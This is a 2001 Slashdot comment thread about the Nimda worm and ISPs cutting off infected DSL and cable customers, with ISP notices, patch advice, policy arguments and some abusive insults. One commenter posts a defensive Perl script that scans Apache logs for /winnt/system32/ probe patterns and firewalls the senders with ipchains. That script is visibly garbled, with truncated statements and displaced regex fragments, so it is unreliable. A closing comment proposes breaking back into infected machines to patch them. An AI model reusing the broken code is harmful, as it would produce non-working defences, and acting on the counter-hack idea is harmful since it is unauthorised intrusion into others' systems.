The other vector this virus used was a problem with invalid interpretation of Mime headers, reported in MS01-020 in March of 2001. This was corrected with SP2 of both IE5.01 and IE5.5, as well as IE6.0.
Yes these exploits had been patched many months ago.
No you did not have to subscribe to anything to obtain these patches, they are all available for Free off of Microsoft's website.
http://www.microsoft.com/security
/. tends to have difficulty representing the truth. Personally I blame it on a shortage of anti-depressant medications in Michigan.
Speakeasy is doing the same thing. I got this yesterday.
The affects of this worm are detrimental to all and we'd like to give each
member a chance to secure their machines. However, after 9/23/01,
Speakeasy's Abuse Team will be freezing the DSL circuit hooked to any
machine infected with the worm. We apologize for the inconvenience of
this, but it is imperative that we ensure our network is not assisting in
the propogation of this, or any, worm. All of us are part of a larger
community, and it really isn't cool to infect your neighbors.
-Hash_browns
scattered covered smothered chunked
Being the conscientious sort I went to the Symantec site to see what they had for information on Nimda. I did this Tuesday afternoon. Wednesday morning we were asked to update our virus definitions and shortly thereafter my AV detected Nimda on my Windoze box. When I looked at the files that were infected, they were in my browser cache from my visit to the sarc webpage the afternoon before. I picked up the readme.exe file and the other .eml and html files that this virus spreads.
;) I suspect that they've since cleaned it up, but it shows how easy it can be for even people that know better to get caught offguard sometimes. I spent yesterday watching my Apache logs fill up as the waves of machines pounded against my Linux box. Kinda like "Night of the Living Dead". As if that wasn't enough, the "Virtual Post Card for You" hoax made the rounds this morning (good timing though).
:)
In a case like this it was like going to Dr. Kevorkian for treatment
While my daughter is away at the university, I have Symantec products protecting her Win2k machine in my absence. The school is requiring students to use some MS products for school so it's a necessary evil for now. None of the Comp Sci majors there (freshmen) knows how to use Linux yet. I've been handing out Mandrake and RedHat as well as playing tech support for them while they improve themselves.
You must be the change you wish to see in the world - Ghandi
I don't see what the fuss is all about, I patched my system when prompted to, I updated my Norton antivirus when prompted to, I've went on some websites which had the virus, It detected it, I've received e-mails with it, it detected it.
:)
I'm not a rocket scientist, I've acted like any Net user should do, patching and antivirus are something common in the windows world, bitch as much as you want, if you've done you're homework properly, chances are you didn't get affected by this. Of COURSE some will (people that got it before let's say the Norton update was available), but if everybody would have done his job right, the threat would have been contained and not as big as it is right now.
Paying for norton antivirus? well last time I checked it was about 30$ for an OEM copy, that's nothing compared to paying 40$ for a C00l K-RaD cooler or overpriced pentium IV is it? If you're able to spend 1000$ on a box, spending 30$ for protecting it is an investment.
What I find unacceptable is people that, one week after code red was announced, were still infected and probing my servers. That's irresponsible, and I agree with shutting them down until they fix the problem. Please don't bullshit with freedom and similar crap related issues, if your freedom means slowing down or crashing other people's net experience, it's called BEING SELF-CENTERED and irresponsible. ISP have a responsibility to ensure that the maximum of their userbase aren't affected by any crisis, a complete shutdown may be a bit drastic, but if it's the way to educate people (since it seems that people didn't learn from code red) well, I'm all for it.
I guess I'll be modded as a troll or flamebait, but I do think I'm making sense
--- Metamoderating abusive downgraders since my 300th post.
actually even better than completely cutting off a users net access would be limiting their access and rerouting all HTTP requests a site which explains that they have the virus and provides complete directions on how to remove the virus etc...
then once they have fixed the virus they could perhaps go back to that site, click a button which would somehow verify that they are patched up, and then their connection would be restored...
this limits the damage they can do to others, and limits the time these dsl/cable provider CSR's need to spend dealing with stupid users...
--w
E V E R Y T H I N G I W R I T E I S F A L S E
I have seen in the past web servers that will send the request back to the client if that page is not found. For example if you send a bogus request to thttpd it just sends the request string back to you and says it could not be found. This causes all hell to break loose with IDS systems. So it appears that the attempted victim is an attacker even though it is a patched (or more likely not vulnerable at all). If they just start shutting down peoples connections they could be killing valid users, granted this would probably be a small percentage of users though.
Just a passing thought.
Windows Update will NOT fix NT4 or IIS 4 security problems. I know, I tried it on our intranet server. There were no security updates for IIS. I had to dig for the SRP and install it. Naturally, after the reboot our version of Crystal Reports didn't work and had to be upgraded.
Gamingmuseum.com: Give your 3D accelerator a rest.
what amazes me is that a copy of iis purchased in july 2001 still needs to be patched with a patch released in oct 2000.... This is from personal experience BTW. Hello? what's the big deal of burning the CD with a patched system (say updating it quarterly). Would it add 5 cents to the total cost?
I've been stopping Nimda attacks at the firewall by scanning Apache logs and then adding the offenders to ipchains - which has the nice feature that I can generate a clean list of attackers with "ipchains -L input." In a few cases, I've gone to their Websites and sent messages to the admins about their problem. But for the most part I can't see how to get e-mail addresses for the typical DSL customer (and the majority of machines infected seem to be DSL customers - which makes sense, amateurs who don't know not to trust Microsoft). It might be a privacy issue to provide e-mail, even phone numbers publicly in a form to be looked up by IP for anyone with a static IP, but it would sure help for those of us who'd like to take the time to warn the lusers to fix their messes, and maybe avoid the sort of arbitrary shutdown at issue here. For that matter, it wouldn't be a huge project for providers to set up some sort of a blind e-mail redirector (with good spam filtering) to the customer for each of the static IPs provided.
"with their freedom lost all virtue lose" - Milton
Finally! Someone with half a brain is regulating these idiots. This is not unfair, as a matter of fact, similar things happen in real life. For example: Fire inspections happen once a year at commercial buildings. If your fire systems are not up to code or malfunctioning, you get shut down. If your car is belching polutants, has bad brakes, or bad tires, you fail inspection and get off the road. It's for the protection of society! If you're too stupid to patch your IIS box, too bad!
-ted
My ISP has always had transparent proxy servers for outgoing requests, so as soon as I heard about this and noticed my webserver logs growing several orders of magnitude faster than they normally do, I politely asked my ISP if they could get those transparent proxies dropping nimda-type requests.
Uncharacteristically, they actually paid some attention, and gave me a nice polite reply and a few days later they had gone several steps further. Not only did they block the nimda probes, they also blocked the IE exploit and incoming nimda probes from outside. They also put monitoring software on the proxies so that users who send out a certain amount of nimda probes will automagically get their account suspended and a letter dispatched explaining why.
I'm happy with what they did. It's made those transparent proxies a whole lot more responsive since they aren't constantly forwarding stupid probes from clueless 'admins' who are actually just users who accidentally turned on IIS. All home ISPs should do this - carefully, of course - in order to keep known worms under reasonable control.
From the Slashdot story, "... Microsoft will never fix the problem without making sure people have to pay a monthly subscription for their OS."
I think this is exactly the problem. That's why Windows 2000 was reportedly shipped with 63,000 action items still unfinished. Microsoft knows that, once they deliver one good operating system, most people wiil never buy another. They want to make sure that they never finish the job.
Forcing users to pay for subscriptions would allow Microsoft to make money every year even if it did no more work on the OS. That seems to be the goal: money for nothing.
Microsoft is a very adversarial company, in my opinion. They are not good citizens.
A good partial resolution of the US DOJ vs. Microsoft antitrust case would be to prohibit secret file formats. Then there could be competition again. At present, if a big customer upgrades to a new version of Microsoft Office, and sends out files incompatible file with previous versions, all people who receive the files are forced to upgrade. Companies don't want to go to a good customer and ask them to re-send a docuemnt in a former format.
What Should be the Response to Violence?
Bush's education improvements were
If memory serves me right, AT&T Broadband has a "no servers" clause in their TOS/AUP. I definitely know that @Home has a "no servers" clause. So did Flashcom when they were around.
There are DSL ISPs that don't care about servers on their customer accounts. However, with the advent of Nimda I suspect they will be very, very scarce soon.
An ISP has the right to enforce its policy. It's part of the cost of doing business with them. I'm sure I will be modded down about this, but it's reality. ISPs have it tough now. They are going broke left and right. Nimda might break some of them. Do you want the Incumbent Local Exchange Carriers running EVERYTHING on the Internet? It could happen.
Knowledge is power. Knowledge shared is power multiplied.
Hey moron, MANY people use NT/2K at home and not for only the asinine reasons that your 50cc brain could come up with. Both are much more stable than their 9x/ME brethren (you can grok that, eh Lyenux boi?) and offer much improved multitasking over 9x/ME also. Try working from home, dialed in to an AIX box from win98...I would get tired of having to call lansupport at work and continuously ask them to renew my lease/access code, as my session hung or crashed again (as it is, we are issued new ones every 5 mins, so I could just wait 5 mins..gotta love datacenter environments). I could go on pounding you with a clue-by-four (there's plenty more examples: compiling quake levels in a map editor, photoshop/web design, asp development...why am I wasting my breath on you?) but I think I'll just let this one soak in. For the record I obviously like W2k, but I use one of the *BSD's. You've got a lot of learning to do, kid.
Under capitalism man exploits man. Under communism it's the other way around.
I was browsing around on freshmeat yesterday and found a utility to e-mail infected hosts - it's called codeblue and the URL is here. It scans apache logs and e-mails the infected host with the info.
I completely agree with the tactic of shutting down infected users. They are causing harm to other users and thus are not a good part of the community -- remove them from the community.
I DO NOT support the blocking of ports. I might support the temporary blocking of ports upon individual users for a limited time, and they be notified very clearly, but I use by DSL line for legitimate web page serving and do so responsibly -- with Apache.
If a user does not know how to control their software in their lives, then the software will control their lives. Be in control, or they are out of control.
I thank the ISPs who would support such measures, so long as they do so fairly and make it possible for a user to rejoin the network after they have fixed their problem.
First I agree completely with the decision to block these users. Unfortunately the swiss Cablecom is not bold enough to do the same.
One thing makes me wonder though: Don't they have postal addresses for their users? I mean do they give out accounts without verifying identity and location of customers? That would be a grave risk in itself! And I do expect a provider to inform a customer that has been infected and cut off by snailmail a.s.a.p..
Most ACs are not even worth the keystrokes to insult them. Be generically insulted and ignored otherwise.
As does Verizon's... who is also blocking port 80 and 25 now. Bastards. Considering I don't have to worry about broadband this no longer affects me, but it is the thought that counts.
Something that often gets lost in furor over one of these outbreaks is what the core of the problem is. IP was designed around the end to end principle; dumb interior nodes (routers) and smart end nodes (hosts). This architecture replaced the notion of store and forward networks with intelligent network layers (application layer gateways). Firewalls, NAT's, and stateful inspection boxes (middle boxes) are nothing more than a return to the bad old days of ALG's and their direct implication: strangulation of new services because network-wide flag days are impossible.
Anybody who doesn't understand this ought to take some time to read Elliot Lear's _Foglamps_ piece, as well as listen to some of Steve Deerings rants on network transparency (as presented at the last IETF plenery). To make a long story short, IP is a *very* poorly thought out architecture for an intelligent network, and trying to graft it back onto the current Internet is very, very ugly. Routers fundamentally know about forwarding packets and maybe some stuff about packet classification/scheduling. They don't know squat about the attack de jour, and anybody who tries to tell you otherwise is trying to sell you crack.
So what does that have to do with CmdrTaco's "kill them all, let the ISP sort them out" call? The problem is that disabling network functionality throws the new Internet services baby out with the bath water. How do you plan to run Voip services when both users are behind NAT's? How do not kill new services such as, oh say, napster, IM, etc, etc when the ISP's first response to a security meltdown is to shut off everything except "known applications"? Why would an ISP in their right mind ever lift those restrictions since it's obvious that it is in their best interest (= keep their NOC monkies from endless late nights) to kill first, ask questions later?
The _real_ problem here is the stupid idea that the great unwashed masses are capable of being their own sysadmins. This is silly on its face, but that is the state of the emperor's clothes today. What we really need is for service providers to step up to the job that is sorely lacking right now: a system manager service for people who don't understand or can't be bothered to want to do it for themselves.
Sounds crazy? Well consider the alternatives: strangulation of the net from fascist network admins whose tools are necessarily hamfisted, or death by thousands of script kiddies providing a 21st century tragedy of the commons.
True. But it shows a particular attitude, doesn't it? Ship on schedule, not when the product is finished.
Bush's education improvements were
My DSL ISP just filtered all incoming HTTP traffic to all their customers. My personal WWW server become unaccessible. My Linux box is NOT infected and I do not see why I have to suffer because they are trying to protect some stupid windows users. And this is "business" DSL account!
They want to "prove" that TCP/IP is a bad/insecure protocol because they didn't invent it, maybe even the reason for all the "worm troubles" everyone is having.
They will steal some new technology that they will claim that they have "invented" and lobby for its acceptance for use in its place, but of course it will cost other manufacturers dearly to license the product.
I only hope that they same thing happens as with JScript and their "embrace and extend" tactic they tried with Java.
Women and Alcohol are good seperatly, but mix 'em and they turn you into a dumbass
They can please the fifty percent of the people who want it when it was promised, or they can please the other fifty percent who want it 'when it's done.' Or they can pull an Ion STORM and live off of the hype for four full years, then sink within six months.
Vintage computer games and RPG books available. Email me if you're interested.
Does anyone out there know if these two virus's can affect microsoft personal webserver? I have it running in the background of my windows box and it just hit me, I'm, in essence, running a microsoft server. hmmm.
And, once again, the lameness filter blocks useful information from being posted, while down in level -1 the trolls continue unabated.
:-)
I spent fifteen minutes one day trying to figure out how to get the lameness filter to accept my post, and eventually just blew it off and didn't post.
I'd send Taco a bill for my time, if I wasn't worried he'd send me one for all the emails I've sent bitching about the moderation system.
Why does the mainstream insist on running old software that continues to have holes exploited?
I'm not talking about microsoft products only.
Why do people do an install of RedHat or Mandrake from CD? This is !@#% stupid. Maybe I am biased, being a user of debian.. but doing an upgrade every few days of ALL my software, makes me feel a little more secure..
Sure, the latest/greatest program can have a bug too.. but there is less chance that I have a hole then the chance that mr Redhat or mr NT Wormstation having a hole. If your software is old enough to be burned on a cd, it is too old.
Note this is not saying that all old software is bad, some old software is quite secure and stable.. but the easiest way to keep on top of things is to run an OS with an apt/ports system.
Well, this is good for workstations. What about servers? Upgrade often, but if you run debian.. don't use sid.. use testing (currently woody), usually still very secure but also has extra stability and maybe even security.
When I got my DSL line, I recieved a big hurkin box full of stuff. (Including a very nice Intel NIC.)
If they are concerned about how infected servers, they should work a deal with Linksys or some other manufacturer and ship a firewall box with each install.
They are very simple to set up and keep out the probes to all the ports that Windows leaves open. If people want to run web servers, they have to specifically enable specific ports.
It won't stop the e-mail viruses, but it is a start...
"Trademarks are the heraldry of the new feudalism."
How precisely is this an exploit?
I am running a couple of web servers on my Cablevision cable connection. I run both Apache(linux) and IIS(windows). Cablevision blocked inbound port 80 during the Code Red fiasco because other people's boxes were flooding the network. I'm not a pirate, and my boxes are patched...I say shut off the dumb-asses and leave me alone.
-ted
We are clearly in a time when we are increasingly vulnerable. If we are not capable of stopping these types of attacks in their tracks, we can count on remaining vulnerable not just to the mafia boys of the world, but to nations and organizations who are deadly intent on causing as much destruction as possible.
1) ISPs should allow any and all traffic - they're just service providers. Great idea - and the highway system (ok, let's say toll roads) should let folks drive down them with an M1 Abrahams tank. Armed. Fact is, service providers must for both idealistic ethical and pragmatic financial reasons must choose the greater good of the majority of users - not the imagined rights of any individual to screw it up for everyone else.
2) Cutting users off from the Internet seems a bit harsh. Bull. Having suffered through the Code Red degradation of service, I can guarantee that is a trivial harshness that is necessary. I turned over my scan lists to @home and they politely replied that they were "notifying" the offenders. If these guys were in charge of quarantining an Ebola outbreak we'd all be barfing blood. Blanket port blocking, on the other hand, wrongly damages and restricts responsible users.
3) M$ "fixes" their problems. More pure bull. M$ historically doesn't "fix" problems - they deny, accuse the evil virus writers, then finally stick bandaids on gaping holes - after suggesting that the users employee unworkable workarounds. The real problems are deeply rooted in fundamental design flaws and cannot truly be fixed without a major overhaul - oh yeah, I guess that would be Windows ME.
If enough users who purchase and use defective software get blown off the internet, then maybe, just maybe we'll see fewer ignorant (not stupid - there's a difference) users blundering down the electronic highways in battle tanks just cause some slick salesman in Seattle told them tanks made great family cars.
When by some mysterious way Code Red infected my non service packed, carelessly installed 2000 Server with it's DirecPC USB sattellite modem--I was disconnected. With no clear message why. Actually they somehow managed to turn off the satellite portion, and the network driver used the modem for in and out (as you may know DirecPC uses sat to recieve, modem to send) -- so I just noticed a sudden decrease in speed. I finally called them and they required me to go into my add/remove programs and read the exact number of the Qxxxx patch from microsoft to them before they turned me back on. As I hadn't installed the patch, I couldn't bluff my way through this yet. So I went and got the number-downloaded the patch, and actually installed it. Oh what a pain, but then they just flipped a switch and I was back to psuedo-broadband
Here's part of Speakeasy's statement on the actions they are preparing to take (I'm a residential SDSL customer):
:)
/.*\/winnt\/system32\/.*/) {
/$dupe/){
The affects of this worm are detrimental to all and we'd like to give each
member a chance to secure their machines. However, after 9/23/01,
Speakeasy's Abuse Team will be freezing the DSL circuit hooked to any
machine infected with the worm. We apologize for the inconvenience of
this, but it is imperative that we ensure our network is not assisting in
the propagation of this, or any, worm. All of us are part of a larger
community, and it really isn't cool to infect your neighbors.
Makes sense to me
I run Apache off my DSL network at home, but use it for internal dev purposes only and thus have all but a few incoming ports firewalled.
FWIW, here's a Perl hack to stop DoS-type activity caused by the Nimda worm pounding Apache with Get requests; I've been using on on a RedHat 6.2 server with IPChains for two days now, and it works remarkably well.
#!/usr/bin/perl
# IISBLOCK - Infected IIS server blocking utility.
# by Bill Larson of Compu-Net Enterprises.
# http://www.compu.net. This header must be kept intact if you
# wish to redistribute the script.
my $check = 0;
my $line = "";
my $weblog = "/etc/www/logs/access_log";
my $infection = "/root/infected";
my $removelist = "/root/fwclean";
# create the removelist file so that you can chmod it later and
# automatically clear the firewall.. chmod 700 iisblock
open (HTFILE3, ">$removelist");
print HTFILE3 "#!/bin/sh\n";
close(HTFILE3);
#open the web server log file specified above and start processing
open (HTFILE, "$weblog");
until (eof (HTFILE))
{
$line =;
chop ($line);
#Pattern match on IIS Attempts then strip down to the hostname/ip addresss
if ($line =~
$line =~ s/\ -.*//gi;
# This host is infected so lets do something about it.
}
}
close(HTFILE);
sub infected {
$check = 0;
# begin a check to ensure that we only take action once.
open (HTFILE2, "$infection");
until (eof (HTFILE2)){
$dupe =;
chop ($dupe);
if ($line =~
$check = 1;
}
else {
}
}
close(HTFILE2);
# If this is a unique host continue
if ($check eq "0") {
# time to add to the list of infected hosts
open (HTFILE2, ">>$infection");
print HTFILE2 "$line\n";
close(HTFILE2);
# add using the specified add command
# firewall software will print an error on invalid hostnames.
# Zap them one at a time maunally
system ("/sbin/ipchains -I input -s $line -j DENY -l");
# write firewall removal line to the remove list file
# modify this line for your specific firewall software
open (HTFILE3, ">>$removelist");
print HTFILE3 "/sbin/ipchains -D input -s $line -j DENY -l\n";
close(HTFILE3);
}
# That's all folks!
}
> However you can only use Windows Update if you have a legally purchased copy of Windows...
Uhm, wrong. Perhaps that _might_ be the case with non-Corporate copies of Windows XP, but that's certainly not the case with any other version of Windows. If Windows is installed (and you require a CD Key to install it), then that's all you need.
That's OK, I was getting attacked from a machine owned by a Computer Science Masters Degree student, whose website hosted their resume which spouted all kinds of computer proficiency. I sent them an email, and the machine promptly went offline. Which leads me to wonder what in the hell do they teach CS students these days. And if a CS Masters Degree student is own3d, what makes anyone think Joe 6-pack should not be own3d too.
So is it legal to crack someone else's computer in England? That sounds unlikely.
In the SF Bay Are shut down ALL outbuond port 80 for 2-4 hours when this was occurring. It did not matter who you were or what you were running. There is no NT/2K on my network, but they shut me down regardless.
Personally, I think this is ridiculous.
It would seem to me that charging customers based on usage would give them quite an incentive to pay attention to security. Receiving a bill for $10,000 worth of internet traffic is sure to get just about anyone's attention. Right or wrong, our society is driven by money. If you want people to behave responsibly, there has to be a monetary incentive. This might also help people realize that purchasing bug ridden software is a poor investment.
That would makes sense except that the product shipped 2 years late -- one reason being the extensive QA cycle.
Pick your OS and go ahead and hire a small army of QA folks that are paid bug bounties and so on. If you don't find 63000 issues, somebody's doing something wrong. (I can sit down in front of KDE or Gnome and find 5-10 UI glitchs within a hour without even trying.)
For the past 48 hours my XO DSL (formerly concentric) has been blocking port 80 traffic. Originally all port 80 traffic was blocked, and on and off parts have been open, but now outbound is open. But my hosted sites here are down, and have been for nearly 48 hours. Here is a copy of the email I got from xo:
As a consequence of the increased traffic generated by NIMDA worm, XO will
continue to use filters for Internet traffic on some of our networks. We
will continue to monitor these filters and remove them from the network as
the traffic decreases. In addition, we will continue to investigate
alternative options to filter this traffic.
The filters we have recently implemented block the most common methods used
by the worm to spread via the UDP port 69 (used for TFTP or Trivial File
Transfer Protocol) and inbound TCP traffic on port 80 (used for HTTP or
Hyper Text Transfer Protocol). This filter set may prevent others from
accessing sites on your web servers. These filters will remain in place
until the attacks have been brought under control.
XO customers are encouraged to secure their systems. If the worm has
affected a machine on your network, it must be removed from the network and
reformatted. You can find more information on these attacks and available
remedies from the following links, using an alternate Internet connection if
necessary:
Note that even if I was never infected (I wasn't -- mainly I run FreeBSD, and my win32 machines were patched months ago), I have no option to have them turn it on by telling them I'm clean. I confirmed this on the phone, there's nothing I can do. I am going to call and bitch and make them refund part of my monthly fee. This is bullshit.
I can see blocking people who appear to be infected, but blocking everybody? Ick.
-Justin
Just to let everyone know, since Tuesday, XO has been shutting off port 80 to *everyone*, whether they are infected or not. We don't run any NT servers at all, and there's no chance we've been infected by the new worm. I've been hassling with them for a long time trying to get them to unblock port 80 on our BUSINESS ACCOUNT, but to no avail.
When ISPs get into the habit of deciding what content is OK and what content isn't, we are getting into real trouble. And I think they may be exposing themselves to legal liability as well.
"The way Micro$oft behaves is not normal capitalism. Normal capitalism is trying to make money by providing a useful and quality service or product to consumers, preferably in competition with others. Micro$oft's form of capitalism is to try and make as much money as possible and avoid competing with others by any means possible, legal or no, with no regard for any consumer interests other than those that will make them buy M$ products (such as the superficial qualities of speed and good looks)."
I don't know how to break this to you, but what you've described is "normal capitalism". There's a reason those antitrust laws were passed - when they weren't there, the natural economic environment yielded the railroads, Standard Oil and AT&T.
No one really likes normal, unfettered capitalism, which is why most places restrict it.
It's true what you said. But the 63,000 action items speaks something that I find true.
In my opinion, a rich company like Microsoft could do more to assure the quality of its products.
Microsoft Word 2000, for example, is VERY quirky. Also, even after all these versions, it still doesn't allow on-screen kerning. That's not a good record for a very expensive product of which Microsoft has sold millions of copies.
Bush's education improvements were
And yet I'm sure you'd be screaming with rage if they were shutting down users that had their Linux boxes compromised and being used to DDoS other sites, preaching that it is yet another attempt by "the man" at taking away your freedom. You're a twit, Taco.
Virus = infected
Worm = infested
at least in meatspace
heh, i wanna see some security holes in Hello, World. I'll bet they're out there!
from an email sent to all speakeasy.net users just the other day:
"The affects of this worm are detrimental to all and we'd like to give each
member a chance to secure their machines. However, after 9/23/01,
Speakeasy's Abuse Team will be freezing the DSL circuit hooked to any
machine infected with the worm. We apologize for the inconvenience of
this, but it is imperative that we ensure our network is not assisting in
the propogation of this, or any, worm. All of us are part of a larger
community, and it really isn't cool to infect your neighbors."
every good
Though I agree with you in principle... I think outlawing web servers or other services is stupid...
If you are infected with NIMDA, then your computer, your connection, is attempting to break into hundreds or thousands of other computers from your connection. I'd shut you off as well; your computer is engaging in otherwise illegal behavior, whether you know about it or not.
If you know about it, then you are responsible.
If you don't, you should.
I think that all around, this is the most effective tactic that can be done.
It's fair - if you're not a problem, you don't get affected. If you are a problem, you're neutralized. No collateral damage.
It works for novice and techie alike - no matter what your experience level, you WILL notice your connection no longer works! And all customers know how to call in to support... and then they can get help at an appropriate skill level, along with some well-deserved admonishment.
It's effective - you don't leave people with really nasty infectious diseases out in the general population, you isolate them. You don't ignore the drunk driver, you slam the sucker in the drunk tank overnight. No, computers do not compare to real lives - but neither does losing your ability to websurf compare to losing your car for a year! In relative terms, it's about equivalent.
It also keeps the infected systems from attacking their neighbors - egress filtering, etc, won't do diddly at the local segment, and I can assure you the routers that cablemodems or DSL modems hook into do NOT have enough brains to act as firewalls as well.
There is indeed a problem with getting patches after... perhaps the best implementation of the cutoff would be to reassign their IP into a quarantine range, which can only access the ISP's fixit site (or other people in the quarantine range).
How you can prove you're properly patched, though, is a tough one. I removed several people from an email list I run because they had Sircam, and I simply had to trust them when they said they'd fixed their systems....
You sit there and talk about how those users SHOULD be cut off from the net because of the worm...well, how would you feel if YOU were cut off!? AND STILL CHARGED FOR IT!?
You sit there all smug in your stupid little Linux world thinking you're God's Gift...well Reality Check...most of the world DOES NOT USE LINUX! Face it buddy, people today use Windows and will continue to use it. It's like trying to teach an old dog new tricks.
The problem here is having your net service shut off...and that's an issue when you're paying for something. You don't walk into a McDonald's, order a Big Mac, pay for it, and then get told you can't eat it. If you for one minute think it's justice for DSL.net to cut the connection, think again. It's a paid service. If I'm paying for something, I'd sure as hell want to have access to it, whether the problem lies with virii is my own problem, not my ISP's.
INS (I am not a sysadmin) which I will now prove...
Couldn't the ISPs in question use the DHCP functionality to force any infected customer's machine to re:login to a specific server, separate and created just for infected users, where the only thing they could access via port:80 would be a fix for the problem virus. I realize that this entails a new level of service, not to mention expense, but the alternative of blocking infected users from access to everything, including the fix, seems unethical at least and possibly illegal as well.
I realize that there would have to be a method to kill each specific DSL connection in order to force a fresh login of each infected user's machine as well as a way to ID each infected machine, but it doesn't seem out of the question.
Anybody out there willing to consider this?
Please, feel free to flame away and tell me how ignorant I am. but don't forget that I already know how ignorant I am, so perhaps you should just focus on answering the question...
and the question is this:
given the solutions that currently exist to run an OS on a virtual machine (i.e. VMware and Virtual PC - even thought VPC won't run under Linux --at least not yet.) one could say that the solution could be to do the following...
Use one container file to be the system drive. use another to be the data drive, and ensure that both are always separate. Create a virutal environment once every month that includes all of the known patches for the OS you run on the OS container. Do all of this offline. Then, save the OS container file to a CD and stick it in a vault.) Using your real OS (the host, in this case) figure out a way to have the host monitor the data being pumped from the guest. If the guest becomes compromised, pull the real machine offline, can the process that is the virutal machine, delete the OS container file, copy the good one from the vault, restart the process that is the guest OS and you're back in business in a pretty short time. Without having to take the actual machines in question down to reformat, reinstall, etc. Because the OS running on the real machines has never been compromised. ) So if you need to run IIS and thus Windows, do it in a virutal machine running under a less crackable OS.
Granted, this doesn't not solve the problem of the virtual server being infected, but it does seem to be a way to have the best of both worlds without the gooey mess.
Plus, running XP under a virutal machine is a way to prevent sudden burps from Microsoft's licensing scheme. You will have to connect to the net ONCE or even have to call their 800 number ONCE while you set up the Virtual machine environment before you make your master copy of the OS container file, and as long as you don't mess with the parameters of the virtual machine, you should be okay. I've not tried XP under VirtualPC or VMware, so I don't know if this is possible. And please, buy the damn copy of XP because you respect intellectual property, even if it is owned by idiots. You will still be abiding by the license agreement because you are only running the operating system on one machine, that being the virtual one.
Okay, let the flaming begin. At least it is an idea and quite a bit fresher than the last 50 or so posts in this thread.
Jack Greenwood Southern California Inland Empire Suburban Hell
I know, it's waaaay too late and nobody will read it anyway.
Last week my car had to be inspected, since it h passed the 100.000km threshold. Nothing serious to report, just refilled the front-window-sprayer with water and the tires with air.
Why isn't there a requirement that you have your computer (read: the software running on it) checked for problems every three months so that the latest patches are installed and that you get a report of "what's wrong with it"?
It's time again for the Internet Surfing License!
Auto-expiring after three months and only renewable if it passes the test.
bash$
ISPs could do this much more gracefully and much cheaper. All they need to do is block all non-HTTP traffic, and redirect all attempts to reach sites other than antivirus sites to a page explaining why the measure is in place and what to do about it.
I run a k12 network in(cough), where there are two people responsible for a three hundred host
LAN. We have a couple people come in over the summer to help with stuff but the kids have
proven to be irresponsible and abusive (it's a
private hi$ school),and cannot be trusted to help more than harm.
We must use M$ clients-there is no option for the uneducated users and teachers we try to support.
There is rarely a day with any spare time for
patching the M$ boxes-we get by with default installs, some basic host based prot.software, a
proxy/firewall and the windoze update. We barely have time to update virus definitions, and when they lapse we get no notice from the teachers and staff. Our internet access is a leased line that
was arranged on a budget sharing a congested
port and single T1 with 12 other affiliated schools through a college isp run by an understaff IT dept. We were badly infected by
the nimda virus.
I get sick of hearing self righteous asses declare
the simplicity of "keeping up to date".
It's BS-you can barely keep everything running
and some users in line and out of trouble.
whack a mole... hahahahahahah... That's hilarious.
mov ax, 13h
int 10h
It all depends on how cynical you want to be.
Me, I like to think that those laws reflect what we would like capitalism to be like, and that that is what should be called "normal" capitalism.
But regardless of what you want to call it, Micro$oft does behave like that, and it is a lot worse than most other companies, and it is also so bad that it warrants spelling Micro$oft with a $, which what we were talking about...
Microsoft's Critical Update Notification program, available at windowsupdate, gets added to Scheduled Tasks and does exactly what Oilchange, AutoUpdate, etc. do, but just for critical Windows updates.
you fucking asshole.
READ YOURSELF YOU STUPID DIPSHIT!
WHAT THE FUck IS WRONG WITH YOU.
Why can't strategies like this be targetted at spammers? That would REALLY make the world a better place...
It seems that it should be possible to write a program that waits for compromised systems to attack them and then re-infect the machines with a patch or at least something that prevents further attacks. I mean, these are compromised systems right? They should still be vulnurable. Why can't the good guys use the tools of the bad guys?